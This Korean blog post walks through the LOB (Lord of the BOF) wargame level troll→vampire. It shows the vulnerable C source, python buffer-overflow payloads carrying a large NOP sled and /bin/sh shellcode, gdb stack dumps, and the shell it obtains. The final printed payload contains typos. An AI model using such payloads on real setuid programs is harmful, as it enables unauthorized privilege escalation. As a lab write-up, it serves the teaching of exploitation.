troll / aspirin 으로 접속
vampire.c
[troll@localhost troll]$ ls -l
total 16
-rwsr-sr-x 1 vampire vampire 12103 Mar 2 2010 vampire
-rw-r--r-- 1 root root 550 Mar 29 2010 vampire.c
[troll@localhost troll]$ cat vampire.c
/*
The Lord of the BOF : The Fellowship of the BOF
- vampire
- check 0xbfff
*/
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
char buffer[40];
if(argc < 2){
printf("argv error\n");
exit(0);
}
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
// here is changed!
if(argv[1][46] == '\xff')
{
printf("but it's not forever\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
argv[1][46]이 \xff가 되면 안되는 조건이 추가되었다. 그리고 환경변수와 버퍼를 초기화하는 조건이 사라지고 argv[2]를 를 쓸 수 있게 되었다.
스택이 커질수록 낮은 주소를 사용해야 한다. 스택 프레임을 크게 만들어 0xbffeffff이하의 영역을 사용해야 되기 때문에, nop를 10만개정도 줄거다.
[troll@localhost troll]$ ./vampire2 `python -c 'print "A"*47+"\xbf"+"\x90"*100000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA퓧릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱?릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱
...(생략)
Segmentation fault (core dumped)
core를 분석해보자
[troll@localhost troll]$ gdb -c core -q
Core was generated by `릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱?릱릱릱릱릱릱릱릱릱릱릱'.
Program terminated with signal 11, Segmentation fault.
#0 0xbf414141 in ?? ()
(gdb) x/10000x $esp
...
0xbffffc30: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc40: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc50: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc60: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc70: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc80: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc90: 0x90909090 0x6850c031 0x68732f2f 0x69622f68
0xbffffca0: 0x50e3896e 0x89e18953 0xcd0bb0c2 0x454c0080
(gdb)
0xbffffcb0: 0x504f5353 0x7c3d4e45 0x7273752f 0x6e69622f
0xbffffcc0: 0x73656c2f 0x70697073 0x68732e65 0x00732520
0xbffffcd0: 0x52455355 0x454d414e 0x4948003d 0x49535453
0xbffffce0: 0x313d455a 0x00303030 0x54534f48 0x454d414e
0xbffffcf0: 0x636f6c3d 0x6f686c61 0x6c2e7473 0x6c61636f
...많이 내렸더니 쉘코드가 있는 부분의 주소가 나왔다.
실수로 nop와 쉘코드를 argv[2]에 넣어야 되는데 argv[1]에 넣어버렸다. 다시 구해주었다.
[troll@localhost troll]$ ./vampire2 `python -c 'print "A"*47+"\xbf "+"\x90"*110000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?
Segmentation fault (core dumped)
[troll@localhost troll]$ gdb -c core -q
Core was generated by `./vampire2 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?릱릱릱릱릱릱릱릱릱?.
Program terminated with signal 11, Segmentation fault.
#0 0xbf414141 in ?? ()
(gdb) x/1000x $esp
0xbffe4d70: 0x00000000 0xbffe4db4 0xbffe4dc4 0x40013868
0xbffe4d80: 0x00000003 0x08048380 0x00000000 0x080483a1
0xbffe4d90: 0x08048430 0x00000003 0xbffe4db4 0x080482e0
0xbffe4da0: 0x080484fc 0x4000ae60 0xbffe4dac 0x40013e90
0xbffe4db0: 0x00000003 0xbffe4ea8 0xbffe4eb3 0xbffe4ee4
0xbffe4dc0: 0x00000000 0xbffffcae 0xbffffcd0 0xbffffcda
0xbffe4dd0: 0xbffffce8 0xbffffd07 0xbffffd15 0xbffffd2e
0xbffe4de0: 0xbffffd49 0xbffffd54 0xbffffd62 0xbffffda3
0xbffe4df0: 0xbffffdb4 0xbffffdc9 0xbffffdd9 0xbffffde4
0xbffe4e00: 0xbffffe01 0xbffffe0c 0xbffffe19 0xbffffe21
0xbffe4e10: 0xbfffffe4 0x00000000 0x00000003 0x08048034
0xbffe4e20: 0x00000004 0x00000020 0x00000005 0x00000006
0xbffe4e30: 0x00000006 0x00001000 0x00000007 0x40000000
0xbffe4e40: 0x00000008 0x00000000 0x00000009 0x08048380
0xbffe4e50: 0x0000000b 0x000001fc 0x0000000c 0x000001fc
0xbffe4e60: 0x0000000d 0x000001fc 0x0000000e 0x000001fc
0xbffe4e70: 0x00000010 0x0f8bfbff 0x0000000f 0xbffe4ea3
0xbffe4e80: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffe4e90: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffe4ea0: 0x69000000 0x00363836 0x61762f2e 0x7269706d
0xbffe4eb0: 0x41003265 0x41414141 0x41414141 0x41414141
0xbffe4ec0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffe4ed0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffe4ee0: 0x00bf4141 0x90909090 0x90909090 0x90909090
0xbffe4ef0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe4f00: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe4f10: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe4f20: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe4f30: 0x90909090 0x90909090 0x90909090 0x90909090
---Type <return> to continue, or q <return> to quit---
0xbffe4f40: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe4f50: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe4f60: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe4f70: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe4f80: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe4f90: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe4fa0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe4fb0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe4fc0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe4fd0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe4fe0: 0x90909090 0x90909090 0x90909090 0x90909090
...
nop가 있는 주소 중에 아무 주소나 고르면 될 것이다.
\xbffee990쯤으로 골라 넣어줬더니 공격에 성공했다.
[troll@localhost troll]$ ./vampire `python -c 'print "A"*44+"\x90\xe9\xfe\xbf "\x90"*110000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x5x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA먬
bash$ my-pass
euid = 509
music world
music world
'시스템 해킹 > LOB' 카테고리의 다른 글
| [LOB] orge → troll (0) | 2021.02.24 |
|---|---|
| [LOB] darkelf → orge (0) | 2021.02.22 |
| [LOB] wolfman → darkelf (0) | 2021.02.22 |
| [LOB] orc → wolfman (0) | 2021.02.21 |
| [LOB] goblin → orc (0) | 2021.02.21 |